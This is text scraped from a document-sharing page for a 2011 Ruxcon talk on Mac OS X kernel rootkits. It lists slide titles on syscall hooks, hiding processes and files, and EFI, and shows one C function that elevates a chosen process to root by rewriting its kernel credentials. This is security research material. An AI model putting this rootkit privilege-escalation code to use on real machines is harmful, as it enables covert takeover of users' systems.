Defiling Mac OS X - Ruxcon - Reverse Engineering Mac OS X - PUT ...

More documents

Recommendations

Info

TECHNIQUES PROCESS PRIVESC Getting rewtz ‣ Direct Kernel Object Manipulation (DKOM) ‣ Previously (see older rootkit examples) ‣ Find relevant process struct ‣ Set cred’s uid/euid to 0 ‣ How now ‣ Find relevant process struct ‣ Copy its kauth_cred & update copy’s uid/euid ‣ Update the process struct with the copy Defiling Mac OS X - Ruxcon November, 2011
TECHNIQUES PROCESS PRIVESC void promote_proc(pid_t pid) { /* TODO: more comments, CUDA optimisations ^_^ */ proc_t p; kauth_cred_t cr; /* Find the process */ p = proc_find(pid); if (!p) { return; } /* Lock, update cred entry, set process’s creds, unlock */ my_proc_lock(p); cr = my_kauth_cred_setuidgid(p->p_ucred, 0, 0); p->p_ucred = cr; my_proc_unlock(p); } UID & GID Defiling Mac OS X - Ruxcon November, 2011
Page 1 and 2: DEFILING MAC OS X: KERNEL ROOTKITS
Page 3 and 4: STUFF Things I will talk about ‣
Page 5 and 6: Defiling Mac OS X - Ruxcon November
Page 7 and 8: GETTING CODE INTO THE KERNEL Defili
Page 9 and 10: TECHNIQUES GETTING CODE INTO THE KE
Page 11 and 12: TECHNIQUES GETTING CODE INTO THE KE
Page 13 and 14: TECHNIQUES DODGY KERNEL SYMBOL RESO
Page 15 and 16: TECHNIQUES DODGY KERNEL SYMBOL RESO
Page 17 and 18: TECHNIQUES SYSCALL HOOKS Old faithf
Page 19 and 20: TECHNIQUES SYSCALL HOOKS static str
Page 21 and 22: TECHNIQUES TRUSTEDBSD HOOKS Trusted
Page 23 and 24: TECHNIQUES TRUSTEDBSD HOOKS kern_re
Page 25 and 26: TECHNIQUES NETWORKING HOOKS Registe
Page 27: ROOTKITTERY Defiling Mac OS X - Rux
Page 31 and 32: TECHNIQUES HIDING PROCESSES Might l
Page 33 and 34: TECHNIQUES HIDING FILES Hiding file
Page 35 and 36: ONE MORE THING... *cue turtleneck*
Page 37 and 38: EFI THE EXPLOSIVE FARMVILLE INVARIA
Page 39 and 40: EFI THE EXPANSIVE FURNITURE INTERFE
Page 41 and 42: REFERENCES Mac OS X Kernel Programm

Defiling Mac OS X - Ruxcon - Reverse Engineering Mac OS X - PUT ...

Create successful ePaper yourself

Delete template?

Save as template?